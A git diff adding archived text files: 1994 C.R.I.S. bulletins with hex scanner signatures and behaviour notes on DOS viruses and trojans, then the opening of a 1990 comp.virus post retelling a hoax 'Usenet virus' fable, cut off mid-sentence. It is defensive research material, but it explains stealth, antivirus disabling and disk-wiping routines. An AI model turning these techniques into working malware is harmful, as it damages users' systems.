good, but the scan string below +for TBAV will detect all files infected with the Greeting virus. +(including encrypted files and original virus com file) + +Testing +The only signs of infection by the Greetings virus is file growth and +memory loss of 2.2k. + +Summary +Greetings is a typical computer virus. Nothing unusual occured during +testing. According to the text that the virus came with, a ball will be +displayed on the screen. I changed the date and time around some, but +still couldn't activate it. I wasn't really impressed, but of course +my idea of a great virus would be one that reaches out of the screen +and grabs you by the neck. A virtual reality virus maybe. Just kidding. + +Prosperous Researching. +Larry Shultz (C.R.I.S) + +- ------------------------------------------------------------------------- +Virus Name: [CrisSig] CMAGIC/fx + Notes: COM INF LOW + Signature: 5D 81 ED 13 00 8B F5 81 C6 0E 00 8A 14 8A 64 01 8B + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : seems to be infected by an unknown virus. + SCAN V111 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +- ------------------------------------------------------------------------- +This virus is a resident .COM infector. It will hook the 21st interupt and +infect any .COM file opened. It appears to contain no destructive code. The +virus is fairly noticable because it makes noises from the PC speaker. These +noises concist of a couple different sounds which last about 5 seconds. +Infected file will have a growth of 2015 bytes however the virus will hide its +size during a directory command while resident in memory. The virus contains +the following message -- [CMAGIC/fx] By Mnemonix V 1.00 1994 + +William Chapman (C.R.I.S) +- -------------------------------------------------------------------------- + +Virus Name: [CrisSig] JIZM TROJAN + Notes: COM EXE TROJ + Signature: 8B D6 33 C9 B8 02 3C 0B FF 74 02 FE C4 CD 21 + +If you add the above signature to your scanner, it will be detected. + +666-JIZM - contains three files. INSTAL_C.COM, YANKEES.COM and +TROJAN.COM. The first two files are simply The Draw saved screens and are +harmless. The file Trojan.com is a trojan to overwrite the first sector of +drive C: by calling and using debug to create and run a file. It goes +under the premise of updating certain The Draw functions. The file is +easily hackable and the signature included takes this into account. + +Bill Dirks (C.R.I.S) + +- -------------------------------------------------------------------------- +Virus Name: [CrisSig] ENEMY or [ACIDTRIP] + Notes: COM EXE LOW INF + Signature: 8E C0 48 8E D8 C7 06 01 00 08 00 EB 14 58 50 8E C0 + +If you add the above signature to your scanner, it will be detected. + +This is the Enemy Within virus written by Crypt Keeper of P/S. +This is a resident infector of programs. It hooks Int 21 when it goes TSR +and monitors 2F. It does a call to an undefined function to determine it's +presence. It also leaves a file marker to determine infected files. It infects +.EXE's only with a file increase of 644 bytes. Memory is reduced by 1040 bytes. +This program is semi-stealth insomuch while TSR, infected file sizes look the +same, file date/time stamps remain unchanged and it seems it performed its +infections normally after a file terminates execution. This appears to be done +with the PS-MPC or similar virus construction kit. + +ACIDTRIP - The Acid Trip virus written by Crypt Keeper of P/S. is virtually +identical to the Enemy Within virus except it is suppose display a msg to +the screen. File increase is 694 bytes and memory is reduced by 1364 bytes. + +Bill Dirks (C.R.I.S) +- -------------------------------------------------------------------------- + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) +ͼ + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLVWE46M4CDusTF+9AQGQUAH/Shz56Rds37PSa032jhFF+C1WlmeiXQ6k +Uu+5yeXK0FYeOACM13dQ+9xp0JP/kezraxsLh0dMi4+BTjMVMB4+aQ== +=60gD +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S. New Viruses - Signature Warning + +- - ------------------------------------------------------------------------------ +Virus Name: [CrisSig] Dieted Nichols Dropper + Notes: COM EXE DROP + Signature: 73 F3 A6 C3 E4 E3 FF 11 02 E9 CD 20 + +Virus Name: [CrisSig] New Nichols + Notes: BOOT INF + Signature: TBAV EB 23 ?@23 FA 33 C0 8E D0 + SCAN EB 23 *(23) FA 33 C0 8E D0 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +NICHOLSD - +This is the dropper for the Nichols virus. It will infect the MBR +of floppies. Once done, infected floppies will infect hard disks. It stores +the original boot sector so the system remains bootable. It was written by +Apache (of ARCV?). It seems to have no payload and is only meant as a +nuisanse. The dropper program is Dieted. The virus itself is not encrypted. +It will momentarily display [Nichols] by Apache. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] Addict9 + Notes: COM EXE LOW INF + Signature: 2E A1 6C 05 2E 0B 06 6E 05 58 75 07 9C 2E + +F-Prot 2.10C : Infection: _1364 - Modified (700 extra bytes) + TBAV 6.10 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +ADDICT9 - +This is a resident infector of executables to include Command.Com. It +will infect .COM & .EXE files and leave them runnable. +It does have a payload and unique activation routine. As the virus passes +from one machine to another, it stores and compares BIOS data. When it is +on a new machine, it increments an internal counter which is saved. After +255 seperate machine infections, a routine to overwrite the first 64 +sectors of drive C will be called. Infected files increase in size by +1364 bytes. The original date/time stamp is maintained. The virus will +tunnel to get the original INT 21 but doesn't employ any real stealth +techniques. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] 44 {43} Trivial + Notes: COM INF + Signature: B4 4E 33 C9 BA 25 01 CD 21 B8 02 3D BA 9E + + + F-Prot 2.10 : Seems to be infected by an unknown virus. + TBAV 6.10 : Infected by Trivial {1} + SCAN V108 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +44{43} Trivial is a non-resident .C* overwriting virus which is greater than +43 bytes in size. The source code claims that the virus is 44 bytes however +when compiled it is acutally only 43. The virus does have a bug that upon +execution it does infect all .C* files in the directory, but it prints garbage +(actually itself) to the screen and the the system hangs. +It was written by Dark Helment. + +William Chapman (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] MAX + Notes: COM EXE BOOT INF + Signature: E8 03 00 ?3 5D 0E 16 58 59 33 C8 75 37 B8 01 02 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +This virus is a funny little thing. For how simple it is, it has kept our +researchers busy. MAX is a new virus from Memory Lapse [P/S]. When first +sent to us it had some claims that we had to check out right away. First +it was sent up as a simple memory resident .COM infector. One researcher +had a quick look at it and said [BOOT VIRUS]. + +Later we were told that it would format a drive on 10/29. We checked this +out to be not true. Memory Lapse has out done himself with this one, his +pratice on all of those 'clean programmed' .com and .exe memory resident +viruses has brought him to the place of writing something new, and here +it is ... There were many other claims and false panic alarms on this file, +but here is the scoop. + +MAX - Once a dropper file is run on the PC this file will infect the MBR of +the hard disk. The virus will not go memory resident at this time, nor will +it infect any files. Once the machine is rebooted the virus will go memory +resident and start infecting .COM files adding 347 bytes to infected files. +There will be no time or date changes on infected files. Note also that it +worked here just fine on all machines tested. Also with different versions +of DOS we had no problems infecting bait files. This virus spreads like wild +fire. One researcher here had a problem making it work on his IBM XT eith two +different versions of DOS. (Everyone else testing it using AT's with no +problem at all) + +The signature above will detect the virus both in the MBR and ALL infected +files on the hard disk. + +Michael Paris (C.R.I.S) +- - ------------------------------------------------------------------------------ + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) CRISMCAF (SCAN CrisSig) +ͼ + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTuEfqM4CDusTF+9AQEX/wH8DFmLyPtbrZSPc6ibxxTEsWPm+ehPJTvp +UeEIlrmw4vRYqgvGTvcIFXMeTsuNlcrEK/FeIsqpAx7G1K7cz5/x0g== +=t+GS +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +New Virus - Signature Warning + +- - ------------------------------------------------------------------------------ +Virus Name: [CrisSig] Jackel5a + Notes: COM EXE ATE INF + Signature: 0E ?3 0l ?6 Ch + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V109 : Infected items: 00 + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +JACKEL5A - +This is a simple dropper that really doesn't spread well at all. The only +file I could get it to infect was format.com and files that called/used it. +The threat from this spreading on a system is practically nil due to bugs in +the code. It will however do quite a few things well that are noteworthy. +Namely, they open you up to other virus attacks. It will upon execution +disable Central Points resident AV code (VSAFE and probably also MSAV by MS). + +It will then delete the following files created by other AV packages. +Antivir.dat, Chklist.cps, *._??, and Scanval.val. It also has a null routine +to activate a yet to be included routine on the 13th of any month. +Also, this thing looks for it's own signature effectively in files and +memory, but it won't prevent multiple reinfections of an already +infected file 50% of the time. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] Mordor File infector + Notes: COM EXE BOOT HIGH INF + Signature: 0E 1F BF 1A 01 80 3D BA 74 10 B9 56 04 BF 1A 01 + +Virus Name: [CrisSig] Mordor Boot infector + Notes: BOOT INF + Signature: 9C 50 51 52 1E 06 B4 CD 1A 80 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : infected by Mordor virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +MORDOR - This is a nasty little virus. It is encrypted but keeps a fairly +static decryptor. It starts off by disabling VSAFE/VWATCH. It then checks to +see if it is resident. It does this by checking Int 21-DA which is normally +used by Basic/Basica. It will go upon various factors, while resident and at +other times remove itself. When it goes resident, you will normally lose the +function of the highest placed TSR/Driver. SCSI users will probably lose access +to their SCSI devices when Mordor is active due to the area it overwrites as a +work area (TOM). Possible video skewing also. When active, it will overwrite +code starting at segment 9F80. On March 31st it will display a message. If you +see this message it is important. The following day/month, April will activate +it's destruction routine. This routine will overwrite tracks 0-17 on heads 0-4 +with whatever info is sitting in 5000:5000 in memory. It will reboot (semi- +cold) the system at this time using the infection code to ensure complete +obliteration of data (FAT+). It looks like it will infect/overwrite any +executable. It does trap Int 21 (Dos services) & 24 (Critical Error Handler). +Except for Mar 31st and the month of April, it appears to try and do nothing +other than spread. Multidisk systems should only have drive C (1st hard disk) +affected by the destruction routine since their is no drive stepping routine. +Fromn the routines I saw, it can best be desribed as semi-stealth. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] Dementia Pracecox 2.0 + Notes: COM INF + Signature: 5D 81 ED 14 01 8B F5 81 C6 38 01 8B DD 81 + +F-Prot 2.10 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : probably infected by an unknown virus + SCAN V108 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +Dementia is a non-resident infector of .COM files that will change +infected files 609 bytes. Dementia 2.0 will also infect all .COM files +in the directory one up from the current directory with no date or time +changes made to infected files. This virus contains the message [DR/2] +Dementia Praecox by Mnemonix + +William Chapman (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] PET (ARCV) TROJAN + Notes: COM EXE ATE DROP + Signature: 90 90 BA AC 02 33 C9 B8 02 3C CD 21 93 B4 40 + +Virus Name: [CrisSig] PET (ARCV) TROJAN + Notes: COM FND TROJ + Signature: B0 02 B9 FF 00 33 D2 CD 26 B0 03 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +PET - +This is more a trojan than a virus. The only files it will actually +infect in any matter is a:\command.com , a:\dos\command.com , and +a:\windows\win.com. It does this by truncating the files and trojanizing +them. The new file length is about 38bytes. The trojan code is designed to +overwrite the first 255 sectors of drives C thru F. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] HSPAWN + Notes: COM INF + Signature: E9 01 02 AC 0A C0 75 FB 81 7C FC 45 58 74 3E 81 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +HSPAWN - +This is a very agressive resident spawning/companion type virus. When an +.EXE file is executed, a companion .COM is created containing an exact +image of the virus. The size of these files is 1115 bytes and are hidden. +This virus does incorporate some stealth techniques that prevent most +TSR AV software from detecting it's presence and actions while active. It +is a little picky about its environment. Depending upon device drivers +loaded, it may lock the system when it attempts to go TSR. Cleaning a +system of this involves deleting all the hidden .COMs created. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] OSPRING - (First Generation) + Notes: COM EXE INF LOW + Signature: BB 11 01 53 C3 E9 E9 20 BB 11 01 53 C3 E9 E9 36 + +Virus Name: [CrisSig] OSPRING (089) + Notes: COM EXE INF LOW + Signature: ?1 09 ?2 C3 E9 E9 ?2 BH 37 ?1 90 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +OSPRING - This is a resident direct infector of .COM files and a spawns +companion .COMs for .EXE files. It uses a variable encryption scheme and +generates a certain amount of polymorphism. It was intentionally designed to +attempt to bypass hueristic scanning. File size increases of .COM file +infections varies and is typically around 1570 bytes. Spawned .COMs are an +image of the virus and appx. the same length. Spawned companion .COM files are +made read only and hidden. 5 files will be infected each time an infected file +is run. It is semi-stealthy. No real tunneling. Files will retain their +original date/time stamp and by using hidden companion .Com files, a little +hard to detect. It will kill Antivir.dat and Chklist.* files. It will not +infect Command.Com. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) CRISMCAF (SCAN CrisSig) +ͼ + +- -----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTuBnqM4CDusTF+9AQFYzQH8D9UoT/qpTIQoHwX5ue2p2U7n4VMCx6dN +77MgIr+RtqG+otmMAe6muutt9PcwESLjXESEbx5x3EUsrhCsItU/3A== +=Hq0x +- -----END PGP SIGNATURE----- + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTuEhqM4CDusTF+9AQFT2gH/ffwdf9uwtT9b6NEqJe31YfnUC4DHoOSF +NKlEbejobhPjyAdF0abKcvDLB8NXO4Rn6/3nquZNwYR3cARUsKncoA== +=jklc +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +- ------------------------------------------------------------------------ +C.R.I.S. New Virus Signature Warning (CrisInfo.013) +- ------------------------------------------------------------------------ + +You can freq a complete CRIS TBAV Update signature file from 1:115/863 +with the magic name CRISTBAV (Works With REGISTERED VERISONS ONLY) + +CrisSigs are made at no charge to anyone that wants to use them. They +are not ment as positive 100% infection protection. CrisSigs serve the +user that wants to have that 'extra' protection until the virus is added +to the scanner they are using. + +In the history of CrisSigs there have been (3) signatures that have given +warnings on files that were not infected but claimed to be on some files +that were scanned. By using CrisSigs the chance is there to get a false +virus warning but we feel it is better safe then the chance of loosing +your files or hard disk. + +All of the CrisSigs have been tested to work on the viruses below and +have been tested for false alarms and found none. + +Michael Paris [Cris Staff] +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Skid-Row + Notes: EXE COM LOW INF + Signature: B4 0D CD 21 B4 52 CD 21 FC 26 C5 77 12 C5 + + + F-Prot 2.11 : No virus found + TBAV 6.12 : May be infected by an unknown virus + SCAN V113 : No Virus found + +If you add the above signature to your scanner, it will be detected. + +First I must say that I truely enjoyed researching this little bugger. It +is a very smart little virus. Upon execution of the infected drop file +nothing out of the ordinary happened. No bait files show alteration, nor +did any other file for that matter. The TRS scanner did not go off, nor +was there a change in memory size or status. A dud, NO WAY! Scanning the +drive again with various scanners (ones on the HD at time of execution) +showed no changes anywhere on the hard drive. So I rebooted and ran TBAV +from a protected diskette and found that all EXE's were indeed infected and +changed. There was no change however in the size or date/time stamp of any +files. EXE's were infected all over the HD, however NO bait files were +infected at all. The virus showed no interest in any COM file including +COMMAND.COM. + + Rebooting again I ran the infected files to observe activity. Qdos was + the file run. At this time the virus displayed the text below. + + This is Skid_Row Virus + Written by Dark Slayer + * in Keelung. Taiwan* + +It did appear to cause the system to hang a few times, I am however not +sure whether the virus caused this, or if it was just the old XT that was +being used to test. + +The virus does go memory resident, even though no TSR's would detect it, +because after termination of infected programs, the message screen will +intermittently appear. Always when a drive is changed. (A: B: C: etc) +At this point I extracted a string to test out. The string was install in +TBAV and the harddrive was planted with more files (clean) and few odd +virii. The string identified all the infected file and gave no false +alarms. Next I rebooted and compiled the string into TBAV on the hard drive +and ran the scan again. SHIDROW would not scan. The other virii on the +drive, including some that were user defined, scanned but not Skid-Row. It +seems to be full stealth once it becomes resident. Rescanning from a +write protected disk showed that all the files were indeed still infected.. +The original infected file SKIDROW.COM after execution became memory resident +and no longer showed infection. + +Art Mason [Cris] + +More on Skid Row by: Staale Fagerland + +This virus, both in its a and b version, uses the old beast technique for +hiding itself in memory. One buffer is unlatched from the dos buffer pool +and taken by the virus. + +It is a fast infector, infecting on open as well as on execute. This means +that if you scan with this virus in memory, all eligible files opened by the +scanner will be infected - if your scanner is not able to see it in memory +and stop before it starts opening files. + +The virus infects nothing but exe-files with enough space for it in the +exe header. No file growth, and no infection of com files. But infected +exe-files will after infection have a com structure. + +It is also a stealth virus, disinfectiong on the fly. It seems to use +int13 for both the stealth functions and the infection routine. Int13 +is hooked, but not directly. + +Some quick ways to determine if you have this one in memory: + +1. Look at the dropper with a file browser such as list. If it is + active, you will not be able to see the virus code. + +2. Count the dos buffers. If the virus is up and running, you will + have one less than you thought you had. + +3. If you use a good memory tool, such as MAM, you will see int13 + pointing both at the dos buffer pool _and_ at HMA. Dead giveaway. + + +Regards +StF +- ----------------------------------------------------------------------------- + +Virus Name: [CrisSig Covina + Notes: EXE COM TROJ + Signature: FC 06 1E 0E 8C C8 01 06 35 01 BA 85 00 03 + +F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.12 : Nothing + SCAN V113 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +The Covina Trojan: + +This is a Trojan that adds a line to the end of the autoexec.bat file +to do an unconditional format of the hard disk. When the file run it +will search for the autoexec.bat file on the C: drive and update it with +the command needed. This trojan was written by someone named Super Tanker. + +Michael Paris [Cris] +- ----------------------------------------------------------------------------- + +Virus Name: [CrisSig] Yesturday Once More [YOM] + Notes: EXE COM INF + Signature: 5D 81 ED 0D 01 E8 25 01 B8 53 46 E8 A0 01 + +F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.12 : probably infected by an unknown virus + SCAN V113 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +The YOM virus was written in Finland by Pepper, it is suposed to be his +first non-overwriting virus. This file was written 01-April-94. + +Files will change in size 529 bytes but no time or date changes at all. +According to the programmer this virus has 256 different forms of mutation. +All the texts and some parts of code are mutated. Number #00 of mutations +is the unmutated virus. + +Infects COM-files, within the length of 123-63999 bytes. Doesn't infect +command.com. Uses dotdot-method. Infects 2 files from every directory +from current one to root directory. Checks for previous infection, +Restores date and time stamps, deinits VIRSTOP, Displays a text message +'yesterday once more' every 128th time run and backs up clock by one day. + +Michael Paris [Cris] +- ----------------------------------------------------------------------------- + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60650-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) +ͼ + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLaw4H6M4CDusTF+9AQGmugIArmWkGZpd06NE5uuaFIkAofTYCsiV6/vD +cLZWSHstrFFVT4+ISlHytJti7H6aHRDEwpfOZIZpmnKxwvSrfmpppg== +=lZLu +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +You can freq a complete CRIS TBAV Update signature file from 1:115/863 +with the magic name CRISTBAV (Works With REGISTERED VERISONS ONLY) + +- ------------------------------------------------------------------------ +C.R.I.S. New Virus Signature Warning (CrisInfo.012) +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Rubbit V1.0 + Notes: COM EXE LOW INF + Signature: BE 03 01 8B 0C 51 33 C0 8E C0 26 80 3E FC + +This signature form will work with any signature format for different scanners + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.11 : No Viruses found! + SCAN V112 : No viruses found! + +If you add the above signature to your scanner, it will be detected. + +Rubbit 1.0 is a memory resident COM infector that adds 681 bytes to +infected files. When the virus goes memory resident it will infect +any file that is run. According the the virus code this virus was +written by Peter Ferng. + +Michael Paris (C.R.I.S) +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Terminator + Notes: EXE COM LOW INF + Signature: 1E 0E 1F 06 B4 52 CD 21 26 8E 47 FE 26 80 + +This signature form will work with any signature format for different scanners + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.11 : No Viruses found! + SCAN V112 : No viruses found! + +If you add the above signature to your scanner, it will be detected. + +The Terminator virus ia a memory resident EXE infector that will get +past most memory resident protection. After the virus becomes memory +resident it will infect any .EXE file that is run. It will add 904 +bytes to infected files. After a number of infections it will display +a graphic screen saying .... + + Don't be afraid. + I am a very kind virus. + You have do many works today. + So, + I will let your computer slow down. + Have a nice day, + Goodbye. + Press a key to continue. . . + +Michael Paris (C.R.I.S) +- ------------------------------------------------------------------------ + +Virus Name: [CrisSig] Oracle + Notes: EXE COM INF LOW + Signature: 5D 81 ED 22 00 1E 33 C0 8E C0 48 33 FF B9 + + F-Prot 2.11 : New variant of Golgi + TBAV 6.11 : probably infected by an unknown virus. + SCAN V112 : No virus found + +If you add the above signature to your scanner, it will be detected. + +Oracle is a memory resident .COM and .EXE infector. Infected files will +have the size of the file increased by 997 bytes. This size increase will +be hidden if the virus is active in memory. Oracle hooks the 21st interupt +and infects files upon execution. However, On the test system the virus +would infect files, however sometimes had problems executing files. The +following occurences happend while testing. All memory mappers did not work, +any file viewer had eratic behavior, and one larger program received an out +of memory error. The virus does create a drive error when attempting to write +to a write protected floppy disk. +The virus contains the following messages: +[Oracle] by Mnemonix + +William Chapman (CRiS) +- ------------------------------------------------------------------------ + +Virus Name: Offspring 0.7 + Notes: COM INF LOW +Signatures: + + TBAV: [CrisSig] Offspring 0.7 + COM INFO LOW + B9 ?1 02 ?1 81 35 *6 47 *5 47 90 *3 E2 F2 C3 + + Scan: "B9?02?8135*(6)47*(5)4790*(3)E2F2C3" [CrisSig] Offspring 0.7 + + + F-Prot 2.11 : Scanned with Heuristics ON. + 21 of the infected 37 scanned as: + "possibly a new variant of Trident" + 16 of the infected 37 scanned as both + "possibly a new variant of Trident" + "seems to be infected with an unknown virus" + + TBAV 6.11 : Scanned with High Heuristics ON + 3 of the 37 scanned as: + "seems to be infected with an unknown virus" + + SCAN V112 : 5 of the 37 scanned as Offspring + 2 of the 37 scanned as Trident + 1 of the 37 scanned as FamN + +If you add the above signature to your scanner, it will be detected. + +Offspring is a memory resident virus. This virus loads into memory and +hooks the 21st interupt. It will infect files when the directory is +changed. It will infect 5 files in the current directory (the directory +the it is leaving). First it will spawn from all .EXE files creating +hidden .COM files which are 1294 bytes in size. After all of the .EXE +files have had .COM files spawned it will then infect .COM files. It +appends itself to the end of the .COM files. The virus is encrypted and +uses an ecncryption routine which throws in NOP's to make the encryption +routine more difficult to use an easier signature on. The virus contains +the follwing messages while in memory. The files are encrypted and the +message is not visible: +"Thank you for providing me with a safe place to live Offspring 0.7" +"*.COM" +"*.EXE" + +William Chapman (C.R.I.S) +- ------------------------------------------------------------------------ + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60650-8077 Voice (708) 863-5472 + BBS (708) 863-5285 crisadm@netcom.com +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates - REGISTERED USERS ONLY) +ͼ + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLZOCzKM4CDusTF+9AQE3OgH/eZ9/j4K9CHhlaUKABMCSoicsQ4RWjg2w +yygU3SvVFNnXsuvKUMwcDqV77UAcyxrtSQH0qVU7LpNz5aNi0JO5+g== +=e3v3 +-----END PGP SIGNATURE----- + \ No newline at end of file diff --git a/textfiles.com/virus/comp.vir b/textfiles.com/virus/comp.vir new file mode 100644 index 00000000..7ecebeb7 --- /dev/null +++ b/textfiles.com/virus/comp.vir @@ -0,0 +1,166 @@ +From cucard!rockyd!cmcl2!phri!sci.ccny.cuny.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!ucsd!rutgers!netnews.upenn.edu!vax1.cc.lehigh.edu!cert.sei.cmu.edu!krvw Fri Apr 20 16:55:42 1990 +Path: dasys1!cucard!rockyd!cmcl2!phri!sci.ccny.cuny.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!ucsd!rutgers!netnews.upenn.edu!vax1.cc.lehigh.edu!cert.sei.cmu.edu!krvw +From: peter@ficc.uu.net (Peter da Silva) +Newsgroups: comp.virus +Subject: Usenet "virus" {Ed. HOAX - no, that's *not* a UNIX variant...} +Message-ID: <0009.9004231214.AA04329@ubu.cert.sei.cmu.edu> +Date: 20 Apr 90 20:55:42 GMT +Sender: Virus Discussion List +Lines: 152 +Approved: krvw@sei.cmu.edu + +> I have to believe that the same yahoos who think viruses are fun +> things on single-user OS machines like PCs and Macs would love to +> infect Unix and VMS systems, if they could. + +They can. + +> I really do believe that these systems are more difficult to +> circumvent, and this has, to some extent, accounted for great disparity +> in the number of successful attacks on these systems as compared to the +> single-user boxes. + +I believe you're right, *but* source code has little to do with it. + +It's been at least 6 months since I posted this little fable. + + The Usenet virus: a case history. + A cautionary tale. + + The Usenet virus was detected when a user discovered that + a program he had received from the net seemed to have two + versions of malloc included with the source. One version of + malloc might be odd, but people have never tired of reinventing + the wheel. Two versions were suspicious, particularly since they + lead to a name conflict when the program was linked. + + The first, lmalloc.c, seemed to be identical to the + malloc listed in Kernighan and Ritchie. The second, bmalloc.c, + was rather strange, so we concentrated our efforts on it... this + time was later found to have been wasted. + + After a little work during spare moments over the course + of a week we decided it was actually a clumsy version of the + buddy system (a fast but space-inefficient method of memory + allocation). It might make a good example of how not to write + readable code in some textbook, but it wasn't anything to get + worried about. + + Back to the first. It made use of a routine named + speedhack() that was called before sbrk() the first time the + malloc() was called. There was a file speedhack.c, but it didn't + contain any code at all, just a comment saying that it would be + implemented in a future version. After some further digging, + speedhack was found at the end of main.c. The name was disguised + by some clever #defines, so it never showed up in tags and + couldn't be found just by grepping the source. + + This program turned out to be a slow virus. When it was + run, it looked for a file 'lmalloc.c'. If it found it, or it + didn't find Makefile, it returned. From then on malloc ran + normally. + + If it didn't find it, it reconstructed it using a series + of other routines with innocuous names tagged on to the end of + other files. This was apparently an attempt to avoid overly + increasing the size of any one of the files in the directory. + + Then it went into Makefile or makefile (it looked for + both) and added lmalloc.o onto the end of the first list of '.o' + files it found. It then reconstructed each of the extra routines, + and speedhack itself, using techniques familiar to any reader of + the obfuscated 'C' contest. These were tagged onto the ends of + the '.c' files that corresponded to the '.o' files in this same + list. The program was now primed to reconstruct the virus. + + On inspection, we discovered that about 40% of the + sources on our system were infected by the speedhack virus, We + also found it in one set of shell archives that we'd received + but never unpacked or used, which we took as evidence that it had + spread to a number of other systems. + + We have no idea how our system was infected. Given the + frequency with which we make modifications and updates, it's + likely that the original speedhacked code is no longer on the + system. We urge you to inspect your programs for this virus in + an attempt to track it to its source. It almost slipped by + us... if the author had actually put a dummy speedhack in + speedhack.c we would have merely taken lmalloc.o out of the + Makefile and defused *this* copy of the virus without being any + the wiser. + + There are other failings in this program that we have + thought of. We have decided not to describe them to avoid giving + the author of this program ideas we might regret. Some ways that + programs like this can be 